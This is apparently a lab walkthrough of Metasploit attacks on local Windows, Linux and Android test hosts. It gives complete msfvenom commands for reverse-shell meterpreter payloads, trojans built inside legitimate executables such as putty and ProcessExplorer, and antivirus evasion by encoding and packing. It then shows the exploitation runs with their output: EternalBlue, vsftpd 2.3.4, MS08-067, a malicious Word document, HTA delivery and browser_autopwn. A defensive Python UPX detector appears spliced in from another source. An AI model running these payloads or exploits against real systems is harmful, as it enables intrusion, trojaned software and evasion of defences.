msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=9999 R > test.apk

Evading antivirus detection

Using MSF encoders
 # msfvenom -l encoders
Framework Encoders [--encoder]
======================================
    x86/shikata_ga_nai       excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit      manual     Single Static Bit
    x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic         normal     Dynamic key XOR Encoder

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
Custom executable template

wget http://download.sysinternals.com/files/ProcessExplorer.zip (it can also be fetched from a domestic mirror)

msfvenom -a x86 --platform Windows -x ProcessExplorer/procexp.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload1.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of exe file: 2661376 bytes
Saved as: payload1.exe

Upload payload1.exe to the Windows host

# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:30805) at 2022-06-28 17:03:05 +0800
meterpreter > pwd
C:\Users\xiang\Desktop
Launching a payload stealthily

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -x putty.exe -k -b '\x00\x0a\xff' -i 10 -f exe -o payload2.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of exe file: 702464 bytes
Saved as: payload2.exe

Upload payload2.exe to the Windows host

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:50055) at 2022-06-28 17:23:50 +0800
meterpreter >
Packing

upx

#upx
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
Commands:
  -1     compress faster                   -9    compress better
  -d     decompress                      -l    list compressed file
  -t     test compressed file                -V    display version number
  -h     give more help                   -L    display software license
Options:
  -q     be quiet                         -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  -k     keep backup files
file..   executables to (de)compress
Type 'upx --help' for more detailed help.
UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io
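An added example, not from the original post: the defender's side of the packing step above, a Python check for UPX-packed PE files. It walks the PE section table for the UPX0/UPX1 section names, looks for the UPX! marker and measures section entropy; the sample executables are constructed header-only stubs, not real binaries, and the 7.2 entropy threshold is an assumed heuristic.

```python
import math
import struct
from collections import Counter

# Section names UPX writes into the executables it packs. Anyone can rename
# them, so this is a quick heuristic for an inventory sweep, not a signature.
UPX_SECTION_NAMES = ("UPX0", "UPX1", "UPX2")
UPX_MAGIC = b"UPX!"          # marker UPX leaves in the packed file's header
ENTROPY_THRESHOLD = 7.2      # assumed cut-off; compressed data sits near 8 bits/byte


def pe_sections(data):
    """Walk the PE headers and return [(name, raw_offset, raw_size), ...].

    Only the fields needed to reach the section table are parsed; malformed
    input raises ValueError instead of silently returning nothing.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    table = e_lfanew + 24 + opt_size
    sections = []
    for i in range(nsections):
        off = table + 40 * i
        if off + 40 > len(data):
            raise ValueError("section table truncated")
        # IMAGE_SECTION_HEADER: Name[8], VirtualSize, VirtualAddress,
        # SizeOfRawData, PointerToRawData, then fields we do not need
        name = data[off:off + 8].split(b"\0", 1)[0].decode("ascii", "replace")
        _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append((name, raw_ptr, raw_size))
    return sections


def entropy(blob):
    """Shannon entropy in bits per byte; packed or encrypted data approaches 8."""
    if not blob:
        return 0.0
    counts = Counter(blob)
    return -sum(c / len(blob) * math.log2(c / len(blob)) for c in counts.values())


def inspect_pe(data):
    """Return the packing indicators a triage script would log for one file."""
    sections = pe_sections(data)
    names = [s[0] for s in sections]
    upx_names = [n for n in names if n in UPX_SECTION_NAMES]
    max_entropy = max((entropy(data[p:p + sz]) for _, p, sz in sections if sz), default=0.0)
    return {
        "sections": names,
        "upx_sections": upx_names,
        "upx_magic": UPX_MAGIC in data,
        "max_section_entropy": round(max_entropy, 2),
        "packed": bool(upx_names) or UPX_MAGIC in data or max_entropy > ENTROPY_THRESHOLD,
    }


def build_sample_pe(section_names, section_data=b"", trailer=b""):
    """Constructed for the demo, not a real binary: just enough headers for the
    parser, one raw blob shared by every section, and an optional tail."""
    opt = bytes(224)                      # PE32 optional header size; contents unused
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, len(opt), 0x0102)
    headers_len = 0x40 + 4 + 20 + len(opt) + 40 * len(section_names)
    table = b""
    for name in section_names:
        table += name.encode().ljust(8, b"\0")
        table += struct.pack("<IIII", len(section_data), 0x1000, len(section_data), headers_len)
        table += bytes(16)
    return dos + b"PE\0\0" + coff + opt + table + section_data + trailer


if __name__ == "__main__":
    sample = build_sample_pe(["UPX0", "UPX1", ".rsrc"], bytes(range(256)) * 4, b"\0UPX!\r\x0c\x08")
    print(inspect_pe(sample))
```

On a real host the same `inspect_pe` call is run over `open(path, "rb").read()` for each executable in the inventory.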

Starting exploitation

Exploiting host vulnerabilities

Exploiting operating system vulnerabilities
Windows 7
msf6 > nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24
[*] exec: nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 16:07 CST
Nmap scan report for 192.168.0.1
…
Nmap scan report for 192.168.0.158
…
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs:  CVE:CVE-2017-0143
| Risk factor: HIGH
…
msf6 > search ms17-010
Matching Modules
================
   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.158:445 - The target is vulnerable.
[*] 192.168.0.158:445 - Connecting to target for exploitation.
[+] 192.168.0.158:445 - Connection established for exploitation.
[+] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.0.158:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.0.158:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.0.158:445 - 0x00000020  65 20 50 61 63 6b 20 31  e Pack 1
[+] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.158:445 - Starting non-paged pool grooming
[+] 192.168.0.158:445 - Sending SMBv2 buffers
[+] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.158:445 - Sending final SMBv2 buffers.
[*] 192.168.0.158:445 - Sending last fragment of exploit packet!
[*] 192.168.0.158:445 - Receiving response from exploit packet
[+] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.158:445 - Sending egg to corrupted connection.
[*] 192.168.0.158:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49667 ) at 2022-06-23 16:32:15 +0800
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >

Windows 2000

msf6> use exploit/windows/dcerpc/ms03_026_dcom
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 192.168.0.170
RHOST => 192.168.0.170
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run
[*] 192.168.0.170:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.0.170:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.0.170[135] ...
[*] 192.168.0.170:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Started bind TCP handler against 192.168.0.170:4444
[*] Command shell session 1 opened (192.168.0.150:34825 -> 192.168.0.170:4444) at 2022-07-21 15:40:55 +0800
Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----
C:\WINNT\system32>
Using a trojan

Windows 10, 7, 2003

msf> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit/multi/handler> set lhost 192.168.0.150
lhost => 192.168.0.150
msf exploit/multi/handler> set lport 8888
lport => 8888
msf exploit/multi/handler> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit/multi/handler> run


[*] Started reverse TCP handler on 192.168.0.150:8888
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:8888 -> 192.168.0.106:3552) at 2022-07-21 11:02:24 +0800
meterpreter >

Exploiting client-side vulnerabilities

Exploiting vsftpd 2.3.4

Linux

msf6 exploit(windows/smb/ms08_067_netapi) > nmap -sT -A -P0 192.168.0.161
[*] exec: nmap -sT -A -P0 192.168.0.161

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 18:36 CST
Nmap scan report for 192.168.0.161
Host is up (0.00081s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.0.150
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_ssl-date: 2022-07-14T10:36:30+00:00; +6s from scanner time.
msf6 > search vsftpd
Matching Modules
================
   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.161
rhost => 192.168.0.161
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.0.161:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.161:21 - USER: 331 Please specify the password.
[+] 192.168.0.161:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.161:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.0.150:35303 -> 192.168.0.161:6200) at 2022-07-14 18:41:26 +0800
Brute-force guessing an open port on the target

Windows 2000

msf6 > use exploit/windows/smb/ms08_067_netapi

msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.0.150:1
[*] 192.168.0.158:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] 192.168.0.158 - Meterpreter session 1 closed.  Reason: Died
[-] Meterpreter session 1 is not valid and will be closed
192.168.0.158 (Windows 2000) shut down automatically
Using an msf.doc file

Windows 2000 SP0/SP4 English

msf6 exploit(windows/browser/ms10_002_aurora) > use exploit/windows/fileformat/ms11_006_createsizeddibsection
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > info
       Name: MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
     Module: exploit/windows/fileformat/ms11_006_createsizeddibsection
   Platform: Windows
       Arch:
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2010-12-15
Provided by:
  Moti & Xu Hao
  Yaniv Miron aka Lament of ilhack
  jduck 
Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Windows 2000 SP0/SP4 English
  2   Windows XP SP3 English
  3   Crash Target for Debugging
Check supported:
  No
Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  msf.doc          yes       The file name.
Payload information:
  Space: 512
  Avoid: 1 characters
Description:
  This module exploits a stack-based buffer overflow in the handling
  of thumbnails within .MIC files and various Office documents. When
  processing a thumbnail bitmap containing a negative 'biClrUsed'
  value, a stack-based buffer overflow occurs. This leads to arbitrary
  code execution. In order to trigger the vulnerable code, the folder
  containing the document must be viewed using the "Thumbnails" view.
References:
  https://nvd.nist.gov/vuln/detail/CVE-2010-3970
  OSVDB (70263)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/MS11-006
  http://www.securityfocus.com/bid/45662
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > exploit
[*] Creating 'msf.doc' file ...
[+] msf.doc created at /root/.msf4/local/msf.doc
#cp /root/.msf4/local/msf.doc /home/jerry/

Copy msf.doc to the Windows machine

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
Open msf.doc on the Windows machine
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.150:8888
[*] Sending stage (175686 bytes) to 192.168.0.169
[*] Meterpreter session 2 opened (192.168.0.150:8888 -> 192.168.0.169:1487) at 2022-07-20 15:47:53 +0800
Attacking with an HTA file

Windows 10, 7

HTA file interpreter

C:\Windows\System32\mshta.exe

Running the HTA file with the interpreter

demo.hta

<html>
<title>WEB安全测试实验</title>
<link
rel="stylesheet" type="text/css"
href="../css/style.css">
<head>
<meta
http-equiv="Content-Type" content="text/html;
charset=utf-8">
</head>
<body>
<h1>WEB 安全测试实验</h1>
</body>
</html>

WEB 安全测试实验

Run directly

Run in a browser

Start the attack

#msfconsole 
msf6 > use exploit/windows/fileformat/office_word_hta
msf6 exploit(windows/fileformat/office_word_hta) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Microsoft Office Word
msf6 exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:4444
msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/jerry/.msf4/local/msf.doc
[*] Using URL: http://0.0.0.0:8080/default.hta
[*] Local IP: http://192.168.0.150:8080/default.hta
[*] Server started.
[*] Sending stage (175174 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:8176 ) at 2022-06-16 16:27:50 +0800

Open a browser on the target, enter http://192.168.0.150:8080/default.hta, and either run it directly or save default.hta and run it afterwards; the attack succeeds.

msf6 exploit(windows/fileformat/office_word_hta) > sessions
Active sessions
===============
  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  1         meterpreter x86/windows  DESKTOP-9A8VFKB\xiang @ DESKTOP-9A8VFKB  192.168.0.150:4444 -> 192.168.0.106:8176  (192.168.0.106)
msf6 exploit(windows/fileformat/office_word_hta) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: C:\Users\xiang\Downloads
=================================


Mode  Size  Type  Last modified  Name
----  ----  ----  -------------  ----
100666/rw-rw-rw-  7185  fil   2022-06-16 16:26:27 +0800  default.hta
100666/rw-rw-rw-  282   fil   2021-04-27 15:13:52 +0800  desktop.ini


meterpreter > pwd
C:\Users\xiang\Downloads
meterpreter > getuid
Server username: DESKTOP-9A8VFKB\xiang
Attacking via a browser plugin: Adobe Flash

This did not succeed; presumably Adobe Flash is no longer supported.

#msfconsole

msf6 > search adobe_flash

msf6 > use 9
msf6 > use exploit/multi/browser/adobe_flash_hacking_team_uaf
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/browser/adobe_flash_hacking_team_uaf) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Using URL: http://0.0.0.0:8080/y0dKYgEIkI2zc
[*] Local IP: http://192.168.0.150:8080/y0dKYgEIkI2zc
[*] Server started.

Install Adobe Flash Player 17 ActiveX on the target; entering http://192.168.0.150:8080/y0dKYgEIkI2zc in the browser then triggers it.

Detecting browser vulnerabilities
Attacking with browser_autopwn

Windows 10, 7, 2003

msf6 auxiliary(server/browser_autopwn2) > use server/browser_autopwn
msf6 auxiliary(server/browser_autopwn) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 auxiliary(server/browser_autopwn) > run
[*] Auxiliary module running as background job 27.
msf6 auxiliary(server/browser_autopwn) >
[*] Setup
[*] Starting exploit modules on host 192.168.0.150...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/QOSlCDKP
[*] Local IP: http://192.168.0.150:8080/QOSlCDKP
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/LNRlnrxdQ
[*] Local IP: http://192.168.0.150:8080/LNRlnrxdQ
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/SytDwnNLVJ
[*] Local IP: http://192.168.0.150:8080/SytDwnNLVJ
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/XxbRZnvPzF
[*] Local IP: http://192.168.0.150:8080/XxbRZnvPzF
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/dIavmEmlsJvA
[*] Local IP: http://192.168.0.150:8080/dIavmEmlsJvA
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/FSRTIbVUWRDsU
[*] Local IP: http://192.168.0.150:8080/FSRTIbVUWRDsU
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/lIROBHwdaD
[*] Local IP: http://192.168.0.150:8080/lIROBHwdaD
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/pyJEvk
[*] Local IP: http://192.168.0.150:8080/pyJEvk
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/huhYFRmk
[*] Local IP: http://192.168.0.150:8080/huhYFRmk
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/jAzqekl
[*] Local IP: http://192.168.0.150:8080/jAzqekl
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/JCbqIs
[*] Local IP: http://192.168.0.150:8080/JCbqIs
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/cBiTChJAeCWA
[*] Local IP: http://192.168.0.150:8080/cBiTChJAeCWA
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/kRyiwct
[*] Local IP: http://192.168.0.150:8080/kRyiwct
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/YYQeJjzuqe
[*] Local IP: http://192.168.0.150:8080/YYQeJjzuqe
[*] Server started.
…
[*] Using URL: http://0.0.0.0:8080/PdyJht6uQ
[*] Local IP: http://192.168.0.150:8080/PdyJht6uQ
[*] Server started.

Enter http://192.168.0.150:8080/PdyJht6uQ (or one of the other URLs) in the browser under test

[*] 192.168.0.106ie_createobject - Sending exploit HTML...
[*] 192.168.0.106mozilla_nstreerange - Redirecting to .html URL
[*] 192.168.0.106mozilla_nstreerange - Sending HTML
[*] 192.168.0.106mozilla_nstreerange - Sending XUL
[-] 192.168.0.106msxml_get_definition_code_exec - 192.168.0.106:10064 - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
[-] 192.168.0.106adobe_flash_rtmp - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
[*] 192.168.0.106ie_cgenericelement_uaf - Requesting: /YYQeJjzuqe
[-] 192.168.0.106ie_cgenericelement_uaf - Browser not supported, sending 404: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Interrupt: use the 'exit' command to quit
msf6 auxiliary(server/browser_autopwn) > sessions -i
Active sessions
===============
No active sessions.
Attacking with browser_autopwn2

Windows 2003

msf6 > use server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) > run
[*] Auxiliary module running as background job 0.
[*] Searching BES exploits, please wait...
msf6 auxiliary(server/browser_autopwn2) > [*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 31.071206468
[*] Using URL: http://0.0.0.0:8080/IqV4IRZ7Q85f
[*] Local IP: http://192.168.0.150:8080/IqV4IRZ7Q85f


[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.
Exploits
========
 Order  Rank       Name                                  Payload
 -----  ----       ----                                  -------
 1      Excellent  firefox_webidl_injection              firefox/shell_reverse_tcp on 4442
 2      Excellent  firefox_tostring_console_injection    firefox/shell_reverse_tcp on 4442
 3      Excellent  firefox_svg_plugin                    firefox/shell_reverse_tcp on 4442
 4      Excellent  firefox_proto_crmfrequest             firefox/shell_reverse_tcp on 4442
 5      Excellent  webview_addjavascriptinterface        android/meterpreter/reverse_tcp on 4443
 6      Excellent  samsung_knox_smdm_url                 android/meterpreter/reverse_tcp on 4443
 7      Great      adobe_flash_worker_byte_array_uaf     windows/meterpreter/reverse_tcp on 4444
 8      Great      adobe_flash_domain_memory_uaf         windows/meterpreter/reverse_tcp on 4444
 9      Great      adobe_flash_copy_pixels_to_byte_arra  windows/meterpreter/reverse_tcp on 4444
 10     Great      adobe_flash_casi32_int_overflow       windows/meterpreter/reverse_tcp on 4444
 11     Great      adobe_flash_delete_range_tl_op        osx/x86/shell_reverse_tcp on 4447
 12     Great      adobe_flash_uncompress_zlib_uaf       windows/meterpreter/reverse_tcp on 4444
 13     Great      adobe_flash_shader_job_overflow       windows/meterpreter/reverse_tcp on 4444
 14     Great      adobe_flash_shader_drawing_fill       windows/meterpreter/reverse_tcp on 4444
 15     Great      adobe_flash_pixel_bender_bof          windows/meterpreter/reverse_tcp on 4444
